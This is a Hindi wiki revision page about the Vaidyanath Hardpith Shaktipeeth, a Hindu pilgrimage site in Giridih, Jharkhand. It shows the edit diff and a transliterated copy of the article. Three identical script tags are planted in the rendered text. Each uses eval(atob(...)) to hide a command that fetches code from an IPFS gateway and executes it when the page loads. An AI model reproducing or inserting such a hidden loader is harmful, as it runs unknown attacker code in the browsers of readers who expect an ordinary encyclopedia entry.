Difference between revisions of "वैद्यनाथ का हार्द शक्तिपीठ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
[[हिन्दू धर्म]] के [[पुराण|पुराणों]] के अनुसार जहां-जहां [[सती]] के अंग के टुकड़े, धारण किए [[वस्त्र]] या [[आभूषण]] गिरे, वहां-वहां शक्तिपीठ अस्तित्व में आया। ये अत्यंत पावन तीर्थ कहलाये। ये तीर्थ पूरे भारतीय उपमहाद्वीप पर फैले हुए हैं। देवी पुराण में [[शक्तिपीठ|51 शक्तिपीठों]] का वर्णन है। वैद्यनाथ का हार्द, 51 शक्तिपीठों में से एक शक्तिपीठ है।
+
{{सूचना बक्सा मन्दिर
*शिव तथा सती के ऐक्य का प्रतीक [[बिहार]] के [[गिरिडीह]] जनपद में स्थित वैद्यनाथ का हार्द या ह्रदय पीठ है और शिव का वैद्यनाथ ज्योर्तिर्लिंग भी यहीं है।  
+
|चित्र=Blank-Image-4.png
*यह स्थान चिताभूमि में है।  
+
|चित्र का नाम=
*यहाँ सती का ह्रदय गिरा था।
+
|वर्णन='वैद्यनाथ का हार्द शक्तिपीठ' [[भारत|भारतवर्ष]] के अज्ञात 108 एवं ज्ञात [[शक्तिपीठ|51 शक्तिपीठों]] में से एक है। इसका [[हिन्दू धर्म]] में बड़ा ही महत्त्व है।
*यहाँ की शक्ति 'जयदुर्गा' तथा शिव 'वैद्यनाथ' हैं।  
+
|स्थान= [[गिरिडीह]], [[झारखण्ड]]
 +
|निर्माता=
 +
|जीर्णोद्धारक=
 +
|निर्माण काल=
 +
|देवी-देवता=शक्ति- जयदुर्गा तथा शिव- वैद्यनाथ
 +
|वास्तुकला=
 +
|भौगोलिक स्थिति=
 +
|संबंधित लेख=[[शक्तिपीठ]], [[सती]], [[शिव]], [[पार्वती]]
 +
|शीर्षक 1=धार्मिक मान्यता
 +
|पाठ 1= ऐसा माना जाता है कि यहाँ सती का [[हृदय]] गिरा था और यहीं पर सती का दाह-संस्कार भी हुआ था।
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी= [[पद्म पुराण]] के अनुसार हृदय पीठ के समान महत्त्वपूर्ण शक्तिपीठ पूरे ब्रह्माण्ड में अन्यत्र नहीं है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''वैद्यनाथ का हार्द शक्तिपीठ''' [[शक्तिपीठ|51 शक्तिपीठों]] में से एक है। [[हिन्दू धर्म]] के [[पुराण|पुराणों]] के अनुसार जहां-जहां [[सती]] के अंग के टुकड़े, धारण किए [[वस्त्र]] या [[आभूषण]] गिरे, वहां-वहां शक्तिपीठ अस्तित्व में आये। ये अत्यंत पावन [[तीर्थ स्थान|तीर्थस्थान]] कहलाये। ये तीर्थ पूरे भारतीय उपमहाद्वीप पर फैले हुए हैं। देवीपुराण में [[शक्तिपीठ|51 शक्तिपीठों]] का वर्णन है।
 +
==संक्षिप्त परिचय==
 +
*[[शिव]] तथा [[सती]] के ऐक्य का प्रतीक [[बिहार]] (अब [[झारखण्ड]]) के [[गिरिडीह]] जनपद में स्थित वैद्यनाथ का हार्द या हृदय पीठ है और शिव का [[वैद्यनाथ ज्योतिर्लिंग]] भी यहीं है।  
 +
*यह स्थान [[चिताभूमि]] में है। यहाँ सती का [[हृदय]] गिरा था। यहाँ की शक्ति 'जयदुर्गा' तथा शिव 'वैद्यनाथ' हैं।  
 
*एक मान्यतानुसार यहीं पर सती का दाह-संस्कार भी हुआ था।  
 
*एक मान्यतानुसार यहीं पर सती का दाह-संस्कार भी हुआ था।  
*[[पद्मपुराण|पद्मपुराणानुसार]] ह्रदयपीठ के समान महत्त्वपूर्ण शक्तिपीठ पूरे ब्रह्माण्ड में अन्यत्र नहीं है- "हार्दपीठस्य सदृशे: नाऽस्ति भूगोल मण्डले"।<ref>पद्मपुराण, पाताल खण्ड</ref>  
+
*[[पद्मपुराण|पद्मपुराणानुसार]] हृदयपीठ के समान महत्त्वपूर्ण शक्तिपीठ पूरे ब्रह्माण्ड में अन्यत्र नहीं है- "हार्दपीठस्य सदृशे: नाऽस्ति भूगोल मण्डले"।<ref>पद्मपुराण, पाताल खण्ड</ref>  
 
*देवी भागवत में वैद्यनाथ धाम को बागलामुखी का उत्कृष्ट स्थान कहा गया है तथा यहाँ की शक्ति को 'आरोग्य' कहा गया है।  
 
*देवी भागवत में वैद्यनाथ धाम को बागलामुखी का उत्कृष्ट स्थान कहा गया है तथा यहाँ की शक्ति को 'आरोग्य' कहा गया है।  
 
*[[मत्स्यपुराण]] में 'आरोग्या वैद्यनाये तु' प्रमाण मिलता है।  
 
*[[मत्स्यपुराण]] में 'आरोग्या वैद्यनाये तु' प्रमाण मिलता है।  
Line 12: Line 31:
 
सुरासुराराधिपाद पद्मं श्री वैद्यनाथ तमहं नमामि॥<ref>शंकराचार्य-भाष्य</ref></poem>
 
सुरासुराराधिपाद पद्मं श्री वैद्यनाथ तमहं नमामि॥<ref>शंकराचार्य-भाष्य</ref></poem>
 
*[[पटना]] से [[कोलकाता]] रेलमार्ग पर स्थित कियूल स्टेशन से 100 कि.मी. दक्षिण वैद्यनाथ धाम (देवगढ़) स्टेशन है।  
 
*[[पटना]] से [[कोलकाता]] रेलमार्ग पर स्थित कियूल स्टेशन से 100 कि.मी. दक्षिण वैद्यनाथ धाम (देवगढ़) स्टेशन है।  
*यहीं सती का हार्दपीठ भी है।
+
*यहीं [[सती]] का हार्द पीठ भी है।
  
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
+
*पुस्तक- महाशक्तियाँ और उनके 51 शक्तिपीठ | लेखक- गोपालजी गुप्त | पृष्ठ संख्या-105 | प्रकाशक- पुस्तक महल
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{शक्तिपीठ}}
 
{{शक्तिपीठ}}
 
[[Category:बिहार]]
 
[[Category:बिहार]]
 +
[[Category:झारखण्ड]]
 
[[Category:हिन्दू_धर्म]]
 
[[Category:हिन्दू_धर्म]]
 
[[Category:हिन्दू_तीर्थ]]
 
[[Category:हिन्दू_तीर्थ]]
Line 32: Line 49:
 
[[Category:धार्मिक_स्थल_कोश]]
 
[[Category:धार्मिक_स्थल_कोश]]
 
[[Category:हिन्दू_धार्मिक_स्थल]]
 
[[Category:हिन्दू_धार्मिक_स्थल]]
[[Category:बिहार_के_धार्मिक_स्थल]]
+
[[Category:झारखण्ड_के_धार्मिक_स्थल]]
 +
[[Category:शक्तिपीठ]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 12:33, 29 September 2014

vaidyanath ka hard shaktipith
varnan 'vaidyanath ka hard shaktipith' bharatavarsh ke ajnat 108 evan jnat 51 shaktipithoan mean se ek hai. isaka hindoo dharm mean b da hi mahattv hai.
sthan giridih, jharakhand
devi-devata shakti- jayadurga tatha shiv- vaidyanath
sanbandhit lekh shaktipith, sati, shiv, parvati
dharmik manyata aisa mana jata hai ki yahaan sati ka hriday gira tha aur yahian par sati ka dah-sanskar bhi hua tha.
any janakari padm puran ke anusar hriday pith ke saman mahattvapoorn shaktipith poore brahmand mean anyatr nahian hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vaidyanath ka hard shaktipith 51 shaktipithoan mean se ek hai. hindoo dharm ke puranoan ke anusar jahaan-jahaan sati ke aang ke tuk de, dharan kie vastr ya abhooshan gire, vahaan-vahaan shaktipith astitv mean aye. ye atyant pavan tirthasthan kahalaye. ye tirth poore bharatiy upamahadvip par phaile hue haian. devipuran mean 51 shaktipithoan ka varnan hai.

sankshipt parichay

  • shiv tatha sati ke aiky ka pratik bihar (ab jharakhand) ke giridih janapad mean sthit vaidyanath ka hard ya hriday pith hai aur shiv ka vaidyanath jyotirliang bhi yahian hai.
  • yah sthan chitabhoomi mean hai. yahaan sati ka hriday gira tha. yahaan ki shakti 'jayadurga' tatha shiv 'vaidyanath' haian.
  • ek manyatanusar yahian par sati ka dah-sanskar bhi hua tha.
  • padmapurananusar hridayapith ke saman mahattvapoorn shaktipith poore brahmand mean anyatr nahian hai- "hardapithasy sadrishe: naasti bhoogol mandale".[1]
  • devi bhagavat mean vaidyanath dham ko bagalamukhi ka utkrisht sthan kaha gaya hai tatha yahaan ki shakti ko 'arogy' kaha gaya hai.
  • matsyapuran mean 'arogya vaidyanaye tu' praman milata hai.
  • shankarachary ne 12 jyortirliangoan ke svaroop varnan mean vaidyanath ko shaktiyukt kaha hai-

poorvottare prajvalikanidhane sada vasantan girijasametam.
surasuraradhipad padman shri vaidyanath tamahan namami॥[2]

  • patana se kolakata relamarg par sthit kiyool steshan se 100 ki.mi. dakshin vaidyanath dham (devagadh) steshan hai.
  • yahian sati ka hard pith bhi hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. padmapuran, patal khand
  2. shankarachary-bhashy
  • pustak- mahashaktiyaan aur unake 51 shaktipith | lekhak- gopalaji gupt | prishth sankhya-105 | prakashak- pustak mahal

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>